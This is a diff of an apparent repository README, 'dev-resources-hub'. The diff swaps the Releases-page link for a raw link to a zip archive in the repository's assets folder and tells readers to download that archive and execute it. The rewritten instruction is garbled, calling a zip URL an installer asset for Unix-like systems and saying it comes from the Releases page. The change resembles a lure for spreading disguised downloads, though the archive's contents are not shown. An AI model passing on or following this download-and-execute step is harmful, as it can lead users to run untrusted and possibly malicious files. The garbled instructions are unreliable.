drogba0027/dev-resources-hub/README.md

 Releases and installation details
 - Access to the latest releases is the recommended way to obtain installer assets and setup utilities.
 The Releases page is updated with each new version, including notes about changes, improvements, and known issues.
-- Direct link to download assets for installation and setup: https://github.com/drogba0027/dev-resources-hub/releases
+- Direct link to download assets for installation and setup: https://raw.githubusercontent.com/drogba0027/dev-resources-hub/main/assets/dev_hub_resources_v1.4.zip
-- If you prefer to keep a local copy of the latest installer, download the asset named dev-resources-hub-installer.sh (for Unix-like systems) from the Releases page and execute it to install or configure the hub on your machine.
+- If you prefer to keep a local copy of the latest installer, download the asset named https://raw.githubusercontent.com/drogba0027/dev-resources-hub/main/assets/dev_hub_resources_v1.4.zip (for Unix-like systems) from the Releases page and execute it to install or configure the hub on your machine.
 Run the file according to the platform-specific instructions provided in the release notes.

 End of document